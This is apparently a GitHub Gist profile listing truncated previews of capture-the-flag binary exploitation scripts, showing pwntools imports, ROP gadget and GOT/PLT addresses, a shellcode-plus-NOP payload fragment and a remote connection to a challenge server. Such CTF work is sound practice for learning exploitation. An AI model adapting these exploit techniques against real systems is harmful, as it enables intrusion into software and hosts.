Skip to content

Instantly share code, notes, and snippets.

View 0xPwny's full-sized avatar

AJ N 0xPwny

  • Segfault the world
  • Morocco
View GitHub Profile
@0xPwny
0xPwny / babypwn.py
Created May 5, 2017 18:42
BabyPwn - Codegate 2017 - exploit
#!/usr/bin/python
from pwn import *
import time
pop2ret = 0x8048b84
pop4ret = 0x8048eec
sendGOT = 0x0804b064
sendPLT = 0x08048700
@0xPwny
0xPwny / pwn100.py
Created March 13, 2017 10:09
LSE CTF smash stack - 100 pts
#!/usr/bin/python
#Author : Abdeljalil Nouiri
#exploit For LSE EPITA CTF : Smash Stack 100pts
from pwn import *
import sys
cmd = 0x8049dc8
#!/usr/bin/python
#Author : Abdeljalil Nouiri
#exploit For LSE EPITA CTF : Tiny Panel 50 pts
from pwn import *
import sys
username = "admin"
@0xPwny
0xPwny / mint.py
Last active March 13, 2017 20:50
Xiomara CTF - PWN 200pts
#!/usr/bin/python
from pwn import *
#Author : Abdeljalil Nouiri
# Xiorama CTF - PWN 200 Mint
"""
#LOCAL
sysoff = 0x00040310
@0xPwny
0xPwny / sandboxed.py
Created February 25, 2017 16:10
OwaspCTF 2017 - AppSec Africa - PWN 200 SandBoxed!
#!/usr/bin/python
#OWASPCTF 2017
#sandboxed exploit Code
import itertools,string,hashlib
import time,sys
from pwn import *
@0xPwny
0xPwny / stack7.py
Created February 25, 2017 16:08
Protostar - satck7
from pwn import *
jmp2heap = 0x804a008
SC = asm(shellcraft.sh())
def pwny(s,addr,shellcode):
payload = ""
payload += shellcode
payload += "\x90"*35
@0xPwny
0xPwny / ultrababy.py
Created February 22, 2017 20:41
Owasp CTF 2017 - AppSec Africa , PWN 100 : Ultra Baby
#!/usr/bin/python
#OWASPCTF 2017
#ultrababy exploit Code
#Abdeljalil Nouiri
from libformatstr import *
from pwn import *
import sys
@0xPwny
0xPwny / hackim_exploit200.py
Last active May 23, 2017 02:18
HackimCTF 2017
from pwn import *
from libformatstr import *
#Exploit the daemon at 34.198.96.6:9001
#Exploitation Question 1 : 200 pts
#HACKIM CTF2017
#exploit by : Abdeljalil Nouiri
con = remote("34.198.96.6" , 9001)
@0xPwny
0xPwny / exploit.py
Last active February 9, 2017 15:03
EKOpartyCTF - Login exploit
#!/usr/bin/python
#author : Abdeljalil Nouiri
from pwn import *
user = "charly"
passwd = "h4ckTH1s"
con = process("./flag")
#!/usr/bin/python
#ROPASAURUSREX - EXPLOIT
#ABDELJALIL NOUIRI
from time import *
import sys
from pwn import *